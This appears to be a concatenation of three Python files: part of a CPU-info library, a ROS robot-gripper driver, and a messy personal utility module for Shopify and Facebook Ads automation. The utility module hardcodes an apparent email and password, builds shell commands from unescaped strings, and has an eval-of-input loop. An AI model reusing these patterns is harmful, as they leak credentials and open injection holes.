flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = _to_decimal_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_platform_uname():
g_trace.header('Tying to get info from platform.uname ...')
try:
uname = DataSource.uname_string_raw.split(',')[0]
family, model, stepping = (None, None, None)
entries = uname.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'family' : family,
'model' : model,
'stepping' : stepping
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_internal():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
g_trace.write('!' * 80)
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'cpuinfo_version_string' : CPUINFO_VERSION_STRING,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'arch_string_raw' : DataSource.arch_string_raw,
}
g_trace.write("python_version: {0}".format(info['python_version']))
g_trace.write("cpuinfo_version: {0}".format(info['cpuinfo_version']))
g_trace.write("arch: {0}".format(info['arch']))
g_trace.write("bits: {0}".format(info['bits']))
g_trace.write("count: {0}".format(info['count']))
g_trace.write("arch_string_raw: {0}".format(info['arch_string_raw']))
# Try the Windows wmic
_copy_new_fields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
_copy_new_fields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
_copy_new_fields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
_copy_new_fields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
_copy_new_fields(info, _get_cpu_info_from_lscpu())
# Try sysctl
_copy_new_fields(info, _get_cpu_info_from_sysctl())
# Try kstat
_copy_new_fields(info, _get_cpu_info_from_kstat())
# Try dmesg
_copy_new_fields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
_copy_new_fields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
_copy_new_fields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
_copy_new_fields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
# FIXME: This should print stdout and stderr to trace log
_copy_new_fields(info, _get_cpu_info_from_cpuid())
# Try platform.uname
_copy_new_fields(info, _get_cpu_info_from_platform_uname())
g_trace.write('!' * 80)
return info
def get_cpu_info_json():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a json string
'''
import json
output = None
# If running under pyinstaller, run normally
if getattr(sys, 'frozen', False):
info = _get_cpu_info_internal()
output = json.dumps(info)
output = "{0}".format(output)
# if not running under pyinstaller, run in another process.
# This is done because multiprocesing has a design flaw that
# causes non main programs to run multiple times on Windows.
else:
from subprocess import Popen, PIPE
command = [sys.executable, __file__, '--json']
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if p1.returncode != 0:
return "{}"
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return output
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a dict
'''
import json
output = get_cpu_info_json()
# Convert JSON to Python with non unicode strings
output = json.loads(output, object_hook = _utf_to_str)
return output
def main():
from argparse import ArgumentParser
import json
# Parse args
parser = ArgumentParser(description='Gets CPU info with pure Python 2 & 3')
parser.add_argument('--json', action='store_true', help='Return the info in JSON format')
parser.add_argument('--version', action='store_true', help='Return the version of py-cpuinfo')
parser.add_argument('--trace', action='store_true', help='Traces code paths used to find CPU info to file')
args = parser.parse_args()
global g_trace
g_trace = Trace(args.trace, False)
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = _get_cpu_info_internal()
if not info:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if args.json:
print(json.dumps(info))
elif args.version:
print(CPUINFO_VERSION_STRING)
else:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version_string', '')))
print('Vendor ID Raw: {0}'.format(info.get('vendor_id_raw', '')))
print('Hardware Raw: {0}'.format(info.get('hardware_raw', '')))
print('Brand Raw: {0}'.format(info.get('brand_raw', '')))
print('Hz Advertised Friendly: {0}'.format(info.get('hz_advertised_friendly', '')))
print('Hz Actual Friendly: {0}'.format(info.get('hz_actual_friendly', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Arch String Raw: {0}'.format(info.get('arch_string_raw', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
if __name__ == '__main__':
main()
else:
g_trace = Trace(False, False)
_check_arch()
|
wsg50_gripper.py
|
import rospy
from wsg_50_common.msg import Cmd, Status
from visual_mpc.envs.robot_envs import GripperInterface
import logging
from threading import Semaphore, Lock, Thread
import time
import numpy as np
GRIPPER_CLOSE = 6 # chosen so that gripper closes entirely without pushing against itself
GRIPPER_OPEN = 96 # chosen so that gripper opens entirely without pushing against outer rail
ROS_NODE_TIMEOUT = 600 # kill script if waiting for more than 10 minutes on gripper
MAX_TIMEOUT = 10
class WSG50Gripper(GripperInterface):
def __init__(self):
super(WSG50Gripper, self).__init__()
self.max_release = 0
self.sem_list = [Semaphore(value = 0)]
self._status_mutex = Lock()
self._desired_gpos = GRIPPER_OPEN
self._gripper_speed = 300
self._force_counter = 0
self._integrate_gripper_force, self._last_integrate = 0., None
self._last_status_t = time.time()
self.num_timeouts = 0
self.gripper_pub = rospy.Publisher('/wsg_50_driver/goal_position', Cmd, queue_size=10)
rospy.Subscriber("/wsg_50_driver/status", Status, self._gripper_callback)
logging.getLogger('robot_logger').info("waiting for first status")
self.sem_list[0].acquire()
logging.getLogger('robot_logger').info('gripper initialized!')
self._bg = Thread(target=self._background_monitor)
self._bg.start()
def _background_monitor(self):
while True:
self._status_mutex.acquire()
if len(self.sem_list) > 0 and time.time() - self._last_status_t >= ROS_NODE_TIMEOUT:
logging.getLogger('robot_logger').error('No gripper messages in {} seconds, maybe the node crashed?'.format(ROS_NODE_TIMEOUT))
self.clean_shutdown()
self._status_mutex.release()
time.sleep(30)
def get_gripper_state(self, integrate_force=False):
self._status_mutex.acquire()
cum_force, cntr = self._integrate_gripper_force, self._force_counter
width, force = self._gripper_width, self._gripper_force
self._integrate_gripper_force = 0.
self._force_counter = 0
self._status_mutex.release()
if integrate_force and cntr > 0:
logging.getLogger('robot_logger').debug("integrating with {} readings, cumulative force: {}".format(cntr, cum_force))
self._last_integrate = cum_force / cntr
return width, self._last_integrate
elif integrate_force and self._last_integrate is not None:
return width, self._last_integrate
return width, force
def get_gripper_limits(self):
return self.GRIPPER_CLOSE, self.GRIPPER_OPEN
def _set_gripper(self, command_pos, wait=False):
self._status_mutex.acquire()
self._desired_gpos = command_pos
if wait:
if self.num_timeouts > MAX_TIMEOUT:
rospy.signal_shutdown("MORE THAN {} GRIPPER TIMEOUTS".format(MAX_TIMEOUT))
sem = Semaphore(value=0) # use of semaphore ensures script will block if gripper dies during execution
self.sem_list.append(sem)
self._status_mutex.release()
start = rospy.get_time()
logging.getLogger('robot_logger').debug("gripper sem acquire, list len-{}".format(len(self.sem_list)))
sem.acquire()
logging.getLogger('robot_logger').debug("waited on gripper for {} seconds".format(rospy.get_time() - start))
else:
self._status_mutex.release()
def set_gripper(self, command_pos, wait = False):
assert command_pos >= GRIPPER_CLOSE and command_pos <= GRIPPER_OPEN, "Command pos must be in range [GRIPPER_CLOSE, GRIPPER_OPEN]"
self._set_gripper(command_pos, wait = wait)
@property
def GRIPPER_CLOSE(self):
return GRIPPER_CLOSE
@property
def GRIPPER_OPEN(self):
return GRIPPER_OPEN
def set_gripper_speed(self, new_speed):
assert new_speed > 0 and new_speed <= 600, "Speed must be in range (0, 600]"
self._gripper_speed = new_speed
def _gripper_callback(self, status):
# print('callback! list-len {}, max_release {}'.format(len(self.sem_list), self.max_release))
self._status_mutex.acquire()
self._gripper_width, self._gripper_force = status.width, status.force
self._integrate_gripper_force += status.force
self._force_counter += 1
cmd = Cmd()
cmd.pos = self._desired_gpos
cmd.speed = self._gripper_speed
self.gripper_pub.publish(cmd)
if len(self.sem_list) > 0:
gripper_close = np.isclose(self._gripper_width, self._desired_gpos, atol=1e-1)
if gripper_close or self._gripper_force > 0 or self.max_release > 15:
if self.max_release > 15:
self.num_timeouts += 1
for s in self.sem_list:
s.release()
self.sem_list = []
self.max_release += 1 #timeout for when gripper responsive but can't acheive commanded state
else:
self.max_release = 0
self._last_status_t = time.time()
self._status_mutex.release()
|
general_stuff.py
|
import os
from time import sleep as sleep, sleep as zz, sleep as sp
from os import system, makedirs
from subprocess import Popen, getoutput, check_output
from json_field import JSONField
from facebook_business.adobjects.targetingsearch import TargetingSearch
from facebook_business.adobjects.targeting import Targeting
# from facebook_business.adobjects.reachestimate import ReachEstimate
from facebook_business.adobjects.customaudiencedatasource import CustomAudienceDataSource
from facebook_business.adobjects.customaudience import CustomAudience
from facebook_business.adobjects.campaign import Campaign
from facebook_business.adobjects.adset import AdSet
from facebook_business.adobjects.adpreview import AdPreview
from facebook_business.adobjects.adimage import AdImage
from facebook_business.adobjects.adcreativephotodata import AdCreativePhotoData
from facebook_business.adobjects.adcreativeobjectstoryspec import AdCreativeObjectStorySpec
from facebook_business.adobjects.adcreativelinkdata import AdCreativeLinkData
from facebook_business.adobjects.adcreative import AdCreative
from facebook_business.adobjects.adaccount import AdAccount
from facebook_business.adobjects.ad import Ad
from facebook_business import FacebookAdsApi
from django.db.models import Q
from django.db import models
from django.conf import settings
from datetime import timedelta, date, datetime
from collections import OrderedDict, Counter, defaultdict
import time
import sys
import subprocess
import shopify
import pyperclip
import pickle
try:import rumps
except:pass
import requests as requests, requests as r
import re
import random
import os
import json
import csv
import copy
import string
g = lambda: globals()
rnd = round
ADSET_TESTING = False
Count = lambda l, x: l.count(x)
Database = "soda"
GLOBAL_ADD_PRODUCT_NOTIFICATION = False
GLOBAL_IMAGE_COMPARISON_TEST_SCORE = 0.9
GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL = 2
GLOBAL_BROWSER_ELEMENT_WAIT_TIME = 3 # 7
GLOBAL_BROWSER_GET_PAGE_WAIT_TIME = 12 # 12 # requires 12
GLOBAL_BROWSER_URLWAIT_WAIT_TIME = 10 # 60
GLOBAL_BROWSER_PAGEGOT_WAIT_TIME = 3 # 5
GLOBAL_BROWSER_REQUIRE_SPEEDTEST = False
GLOBAL_BROWSER_STEP_SLEEPTIME = 0
GLOBAL_BROWSER_WINDOW_POSITION = [0, 0]
GLOBAL_BROWSER_WINDOW_SIZE = [1920, 600] # [1920, 1200]
GLOBAL_EMAILER_INITIALIZE_ERROR_MESSAGE = False
GLOBAL_FIREFOX_PROFILE_PATH = os.path.expanduser("~/Library/Application Support/Firefox/Profiles")
DOWNLOAD_VIDEO = False
WHILE_TRUE = 100000000
EMPTYSTRING = ""
Null = None
Exists = lambda address: os.path.exists(String(address))
Join = lambda *args: args[0].join(args[1])if(2==len(args))else(args[0].join(args[1:]))
Replacements = lambda s, *args, LOL={}: [setitem(LOL,"z",s),[setitem(LOL,"z",LOL["z"].replace(x,j)) for x,j in zip(args[0::2],args[1::2])] ,LOL["z"]][-1]
Split = lambda *args: (args[1].split(args[0]))if(len(args)==2)else(args[1].split(args[0],args[2]))
Strip = lambda s: s.strip()
Title = lambda s: s.title().replace("'S ","'s")
add = "globals().update(g.__dict__)"
midcmd = """process(lambda:[[OSA.log(str(tryreturn(lambda:eval(OSA.log("Func?"))(),ep=1)))]for i in(range(WHILE_TRUE)]))"""
subtract = "g.__dict__.update(globals())"
sys.setrecursionlimit(100000)
"""
if not os.path.exists(homepath("~/.matplotlib")):
import imageio
os.system("mkdir ~/.matplotlib && touch ~/.matplotlib/matplotlibrc && echo 'backend: agg' >> ~/.matplotlib/matplotlibrc")
os.system("brew install ffmpeg &>/dev/null")
os.system("brew install mysql &>/dev/null")
imageio.plugins.ffmpeg.download()
os.system("brew install mpv --with-libcaca &>/dev/null")
os.system("asciiview")
os.system("open ueiraweur.png")
os.system("mpv fasdfs.jpg -vo caca")
"""
""" General-Utils """
def Copy(id,**kwargs):
# v3.3
return [setitem(kwargs,"x",list(map(Integer,key("copied_id", [Shop()(All(Shop)[0].shop_abbreviation),json.loads(requests.post("https://graph.facebook.com/v3.3/%s/copies"%id, data={ "deep_copy":"true",
"start_time":"%s 6:00:00 EST"%(Date().dt(0) if datetime.now().hour in [0,1,2] else Date().dt(1)),
"status_option": "ACTIVE",
"access_token": Shop.objects.all()[0].Facebook_Business_App_Token, }).content.decode())][1]["ad_object_ids"]))) ),
[[AdSet(kwargs["x"][0]).remote_update(params={"status":"ACTIVE"}),Ad(kwargs["x"][1]).remote_update(params={"status":"ACTIVE"}),] if(2==len(kwargs["x"])) else [Campaign(kwargs["x"][0]).remote_update(params={"status":"ACTIVE"}),AdSet(kwargs["x"][1]).remote_update(params={"status":"ACTIVE"}),Ad(kwargs["x"][2]).remote_update(params={"status":"ACTIVE"}),] ],
kwargs["x"],
][2]
def Exec(x,globals_,locals_):
globals().update(locals_)
exec(x,globals())
def Float(x):
return float(x)
def Integer(x):
return int(x)
def String(x):
return str(x)
def Ziff(*args):
s, sep = args[0], args[1]
maxsplit = -1 if len([i for i in args if type(i) == int])==0 else [i for i in args if type(i) == int][0]
fncs = None if len([i for i in args if type(i) == list])==0 else [i for i in args if type(i) == list][0]
y = s.split(sep,maxsplit)
if fncs == None:
return y
else:
y = [fncs[idx](i) for idx, i in enum(y)]
return y
"""
Ziff("x|y|z","|",[lambda i: i*2,lambda i: i*2,lambda i: i*2])
Ziff("x|y|z","|")
Ziff("x|y|z","|",1,[lambda i:i*2, lambda i: i*2])
"""
def add(x,y):
globals()[x] += y
return globals()[x]
def add_tag(x,y):
if x == "" or x == None:
x = y
else:
x += ", "
x += y
x = sorted(set(x.split(", ")))
x = Join(", ", x)
return x
"""
add_tag("","Test")
add_tag("Home","Test")
add_tag("Home, Place","Test")
"""
def add_text_to_file(file, text, line_number):
new_line_text = generate_one_random_number(5000)
os.system("""sed -i "" -e '%ss/$/%s/' '%s'"""%(line_number,new_line_text,file))
with open(file,"r") as f:
new = f.read().replace(str(new_line_text),"\n"+text)
open(file,"w").write(new)
def add_text_to_image(address,text,font=16,position=None):
from PIL import Image, ImageDraw, ImageFont
img = Image.open(address)
d = ImageDraw.Draw(img)
fnt = ImageFont.truetype("/Library/Fonts/Times New Roman.ttf", font)
if not position:
position = (5,5)
d.text(position, text, font=fnt, fill=(0, 0, 0))
img.save(address)
return address
def added_list(*args):
return flatten(args,1)
def address_backslash(address):
return address.replace(" ", "\\ ")
def address_normalize(address):
return(address)if(0==address.endswith("/"))else(address[:-1])
def array_even(data, count):
data2 = data
for data in data2:
while len(data)%count!=0:
data.append("")
return data2
def array_inner_even(data, delimiter="|"):
for idx, i in enumerate(data):
max_len = max(list(map(len, list(map(str, i)))))
for idx2, j in enumerate(i):
j = str(j)
if(max_len!=len(j)):
j = j + (delimiter*(max_len-len(j)))
i[idx2]=j
return data
def array_split(data, count, even=False):
"""
array_split(lrange(45),10)
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15, 16, 17],
[18, 19, 20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 31, 32, 33, 34, 35],
[36, 37, 38, 39, 40, 41, 42, 43, 44]]
"""
import numpy as np
data = list(data)
if len(data) % count == 0:
a = int(len(data)/count)
b = list(range(0,len(data),a))+[len(data)]
a_c = [data[i:i+a] for i in (b[:-1])]
data = a_c
else:
return array_split1(data, count)
data = list(map(list, data))
return array_even(data) if(True==even) else(data)
def array_split1(data, count, even=False):
"""
array_split1(lrange(45),10)
[[0, 1, 2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15, 16, 17],
[18, 19, 20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 31, 32, 33, 34, 35],
[36, 37, 38, 39, 40, 41, 42, 43, 44]]
"""
import numpy as np
data = np.array(data)
data = np.array_split(data, (int(len(data)/count)+1))
data = list(map(list, data))
return array_even(data) if(True==even) else(data)
def array_split2(data, count):
"""
array_split2(lrange(45),10)
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19],
[20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
[30, 31, 32, 33, 34, 35, 36, 37, 38, 39],
[40, 41, 42, 43, 44]]
"""
x = []
y = len(data) % count
z = []
i = 0
z.append(data[0:count]) if int(len(data)/count) == 0 else "`"
for i in range(int(len(data)/count)):
z.append(data[i*count:(i+1)*count])
z.append(data[(i+1)*count:]) if ""!=data[(i+1)*count:] else "`"
return z
def apilimitcall(x, sleeptime = 5):
try:
# [(x.__call__()())if(x.__name__=="<lambda>")else(x.__call__()),blueprint("success")][0]
return [(x.__call__())if(x.__name__=="<lambda>")else(x.__call__()),blueprint("success")][0]
except Exception as e:
blueprint("error: %s; sleeping %s" % (e, sleeptime))
[[blueprint("waiting: %s\r"%(i+1),end=""),time.sleep(1)] for i in range(sleeptime)]
sleeptime = sleeptime + 5
return apilimitcall(x, sleeptime = sleeptime)
"""
x = lambda: (0/0) if random.random() > 0.5 else ()
apilimitcall(x)
"""
def assert_dialog(lambda_function, notification):
try:
assert lambda_function()
except:
OSA.display_dialog(notification, text_prompt = False, buttons = ["OK"])
def bind(obj,name,method):
from types import MethodType,ModuleType,FunctionType
setattr(obj, name, MethodType(method,obj))
def bind2(obj, name):
from types import MethodType,ModuleType,FunctionType
setattr(obj, name, MethodType(globals()[name],obj))
def bind3(obj,func):
from types import MethodType,ModuleType,FunctionType
setattr(obj, func.__name__, MethodType(func,obj))if("<lambda>"!=func.__name__)else(setattr(obj, get_lambda_name(func), MethodType(func,obj)))
def bindm(x,**kwargs):
[bind(x,a,b) for a,b in kwargs.items()]
return x
"""
bindm(AD(),test = lambda self: print(1)).test()
"""
def binded_update(x,y):
lmap(lambda i: bind(x,*i), y.items())
"""
x= AttrDict()
y={"croak": lambda self:print("croaks"),"moof":lambda self:print("moofs")}
binded_update(x,y)
x.croak()
x.moof()
"""
def brewlist(versions=False):
"""
--versions, you get 1.20.1_4, not necessarily what's in brew search. seems that you tended to use latest version.
"""
return getoutput("brew list").split("\n")if(versions==False)else(lmap(lambda x: x.replace(" ", "@"), getoutput("brew list --versions").split("\n")))
"""
brewlist(versions = False)
brewlist(versions = True)
"""
def brightness(lvl):
OSA("System Events", ['brightness %s'%lvl])
def button_up(x=None,y=None,z=None,cork=None,headors=None):
if cork: return [dict(zip(lmap(re_spaces,key('text',headors(x))),lmap(re_spaces,key('text',i)))) for i in array_split(cork(x),int(len(cork(x))/len(headors(x))) )]
return dict(zip(lmap(lambda i: re_spaces(i), key("text",y(x))),lmap(lambda i: re_spaces(i), key("text",z(x)))))
def ceil(x):
import math
return math.ceil(x)
def check_option(option):
option = option.title()
if "Size" not in option and "Material" not in option and "Capacity" not in option and "Height" not in option and "Model" not in option:
return True
else:
return False
def check_output(x):
return or_list(lambda:subprocess.check_output(x,shell=True).decode()[:-1],lambda:subprocess.getoutput(x))
def cm_to_inch(s):
if "cm" not in s: return s
try:
cm_findings = re.findall(r" [0-9]*?cm", s)
for cm_finding in cm_findings:
x = cm_finding.replace("cm","")
x = int(x)
inch_measurement = x / 2.54
inch_measurement = round(inch_measurement, 1)
print("cm_to_inch finding: %scm to %sin" % (x, inch_measurement))
s = s.replace(cm_finding, "%sin"%inch_measurement)
print("[NOTE] function cm_to_inch --questionable use-- ")
except Exception as e:
print("cm to inches error: %s" % e)
print(s)
return s
def cm_to_inch2(s):
if "cm" not in s: return s
__original__ = s
try:
s = " " + s
cm_findings = re.findall(r"( .*?cm)", s)
for cm_finding in cm_findings:
original = cm_finding
cm_finding = cm_finding.replace("cm", "")
cm_finding = cm_finding.split(" ")[-1]
numbers = re.findall(r"[^0-9]*([0-9]*)",cm_finding)
tmp = []
print("tmp numbers: %s" % numbers)
for i in numbers:
try: tmp.append(int(i))
except Exception as e: print("error: %s, %s" % (i,e))
numbers = tmp
print("numbers after tmp: %s" % numbers)
numbers = [str(i) for i in numbers]
the_inch_copy = str(original)
for i in numbers:
rounded = round((int(i)/2.54), 1)
rounded = str(rounded)
the_inch_copy = the_inch_copy.replace(i, rounded)
print("cm: %s; rounded: %s" % (i, rounded))
print("new 'original' : %s" % the_inch_copy)
the_inch_copy = the_inch_copy.replace("cm", "in")
s = s.replace(original, the_inch_copy)
s = s.strip()
print("===\n\n===== now showing comparison..")
print("original: %s" % __original__)
print("\n\n")
print("s: %s" % s)
print("\n\n")
input("is this okay?: ")
return s
except Exception as e:
print("erorrror : %s" % e)
def cm_to_inch3(s):
s = Replacements(s, "2XL", "XXL", "3XL", "XXXL", "4XL", "XXXXL", "5XL", "XXXXXL", "6XL", "XXXXXXL")
swizes = re.findall(r"[0-9]+",s)
swizes = pool(Integer, swizes).result()
swizes_ = pool(lambda i: wall((i/2.54)), swizes).result()
s = Replacements(s, *list(map(str,sum(list(map(list,zip(swizes,swizes_))),[]))))
return s
def cm_to_inch4(a):
return a
w = findall(a,"[\d\.]+cm")
if w:
x = findall(a,"[\d\.]+cm")
assert len(x) == 1
y = findall(a,1,"[\d\.]+cm")
z = int(findall(y,1,"([\d\.]+)cm"))
z = round(float(z)/2.54,2)
z = str(z)
if z.endswith(".0"):
z = str(z).split(".")[0]
replacement_string = "{}in".format(z)
return re.sub("([\d\.]+cm)",replacement_string,a)
else:
return a
def compare_dict(a,b):
x=""
x+="{"
x+="\n"
for c,d in a.items():
x+=" "
x+="'%s': "%(c)
if d != b[c]:
x+="'%s' -> '%s',"%(d,b[c])
else:
x+="'%s'"%(d)
x+="\n"
x+="}"
print(x)
return x
"""
compare_dict(
{'ali_url': 'url',
'fulfilled quantity': 0,
'idx': 0,
'shipping_address': 'Shipping Address, City, State, Zip Code',
'sku': 'sku',
'title': 'title',
'total quantity': 0,
'variant_title': ''},
{'ali_url': 'url',
'fulfilled quantity': 1,
'idx': 0,
'shipping_address': 'Shipping Address, City, State, Zip Code',
'sku': 'sku',
'title': 'title',
'total quantity': 1,
'variant_title': ''}
)
"""
def copy_details():
pyperclip.copy("dsthingasdf@protonmail.com asdfghjkASDFGHJK in the drafts folder")
def copypickles(x,y):
import shutil
shutil.copy(x,y)
def create_directories(*args):
for idx,i in enum(args):
os.makedirs("/".join(args[:idx+1]),exist_ok=True)
"""
create_directories("a","b")
rm("a")
"""
def create_pypi_package(file_in,readme_text,desc):
basic_license = "Python. Free to use no attribution required."
name = file_in.replace(".py","")
version = "0.1.0"
description = desc
author = "pleasefeedme"
author_email = "myfakeemail@gmail.com"
license = basic_license
packages = [file_in.replace(".py","")]
install_requires = []
import os
os.makedirs(name)
os.chdir(name)
open("LICENSE.txt","w").write(basic_license)
open("README.md","w").write(readme_text)
open("setup.py","w").write(
"""
from setuptools import setup
setup(
name='%s',
version='%s',
description='%s',
author='%s',
author_email='%s',
license='%s',
packages=['%s'],
install_requires=%s)
"""%(name,version,description,author,author_email,basic_license,name,install_requires))
os.makedirs(name)
os.chdir(name)
import shutil
shutil.copy("../../%s"%(file_in),"./")
os.chdir("../")
# didn't work
def csed(r="class",s="class"):
greenprint("the use of ' is not supported")
s = s.replace('"','\\"').replace("'","\\'")
blueprint(re.findall(r, open(__file__).read(), flags=re.MULTILINE))
os.system("""sed -i '' -e 's/%s/%s/g' %s"""%(r,s,__file__))
def csv_table_to_html(table):
data = '<table border="1">'
data += '<tbody>'
numerical_row = 0
for row in table:
data += "<tr>"
numerical_col = 0
for cell in row:
data+= ("""<th style="text-align: center; color: #000000;">%s</th>"""%cell) if (numerical_row == 0\
or numerical_col == 0) else ("""<td style="text-align: center;">%s</td>"""%cell)
numerical_col += 1
numerical_row += 1
data += "</tr>"
data += "</tbody>"
data += "</table>"
return data
def csv_table_to_png(bux):
address = str(homepath("~/tavern/tavern/soda/dls/%s.csv"%random.randrange(99999999))).zfill(len("99999999"))
csv.writer(open(address,"w")).writerows(bux)
import pandas as pd
df = pd.read_csv(address)
os.remove(address)
htmTable = df.to_html()
load = re.sub(r"[\n\t]","",htmTable)
import cv2
reds = html_to_png(load)
q = cv2.imread(reds)
quinces = []
for x in range(q.shape[1]):
y = q[0:,x]
print(x, y.shape, set(y.flatten()))
if set(y.flatten()) == {255}:
quinces.append(x)
quinces = list(reversed(quinces))
zealous = None
for greater, lesser in zip(quinces[0:], quinces[1:]):
if (greater-lesser) != 1:
zealous = greater+10
break
redprint(zealous)
v = q[0:,0:zealous]
address = str(homepath("~/tavern/tavern/soda/dls/%s.png"%random.randrange(9999999999))).zfill(len("9999999999"))
cv2.imwrite(address, v)
impreview(address)
return address
def date_of_birth_drawer(date_of_birth, m_num = False):
date_of_birth = String(date_of_birth)
date_of_birth = date_of_birth.zfill(8)
m, d, y = ["January","February","March","April","May","June","July","August","September","October","November","December"].__getitem__(Integer(date_of_birth[:2])-1)if(m_num==False)else(date_of_birth[0:2]), date_of_birth[2:4], date_of_birth[4:]
return m, d, y
def dataframe_to_dictlist(dataframe):
dictlist = []
headers = list(dataframe)
data = dataframe.to_dict()
data_len = len(data[headers[0]])
for idx in range(data_len):
e = {}
for header in headers:
e[header] = data[header][idx]
dictlist.append(e)
return dictlist
def datetime_math(x, **kwargs):
return x + timedelta(**kwargs)
def dbsed(s="",r=""):
csed(r, s)
def deepcopy(x):
return copy.deepcopy(x)
def delete_adset(adset_id):
Del(Get(Adset,adset_id=adset_id))
def delete_adsets():
a_shop()
for i in All(Adset):
if AdSet(i.adset_id).remote_read(fields=["status"])["status"] == "ARCHIVED":
print("Deleting one adset")
Del(i)
lmap(Del,Filter(Adsetinsight,adset_id=i.adset_id))
def delete_data():
lmap(Del,All(AceInTheHole))
lmap(Del,All(AceInTheHoleType))
lmap(Del,All(AceInTheHoleTypeTag))
lmap(Del,All(Adset))
lmap(Del,All(Aliexpress_Dispute))
lmap(Del,All(Aliexpressorder))
lmap(Del,All(Aliexpressorder_event))
lmap(Del,All(ApprovedTransaction))
lmap(Del,All(Facebookadaccountspend))
lmap(Del,All(GhostProduct))
lmap(Del,All(GhostProductUpdate))
lmap(Del,All(Keep_Exchange))
lmap(Del,All(Lineitem))
lmap(Del,All(New_Email))
lmap(Del,All(Order))
lmap(Del,All(Payment))
lmap(Del,All(Payout))
lmap(Del,All(Product))
lmap(Del,All(ProductTalk))
lmap(Del,All(ReOrder))
lmap(Del,All(Settlement))
lmap(Del,All(Soup))
lmap(Del,All(Video))
lmap(Del,All(TertiaryAction))
lmap(Del,All(ProductsFeed))
lmap(Del,All(LineitemsFeed))
def delete_last():
Del(All(RandomGeneratedWords).n(-1))
def dictfromkeys(headers, default_value, ordered=False):
x = dict(zip(headers, [default_value for header in headers]))if(ordered==False)else(OrderedDict(zip(headers, [default_value for header in headers])))
return x
def dictrecurse(attrdict):
for k,v in attrdict.items():
if type(v) == AttrDict:
attrdict[k] = dictrecurse(attrdict[k])
return dict(attrdict)
def dictupdate(x,**kwargs):
x.update(**kwargs)
return x
def decimal_re(x):
return Integer("".join(re.findall(r"\d+", x)))
def delete_keys(x,*args):
for i in args:
tryprocess(lambda: x.__delitem__(i))
return x
"""
a = {"a":"b","c":"d",}
delete_keys(a,"a","c")
"""
def dictionarymeaning(x):
from nltk.corpus import wordnet
y = sudby(lambda i:i.name().split(".")[0]==x,wordnet.synsets(x))
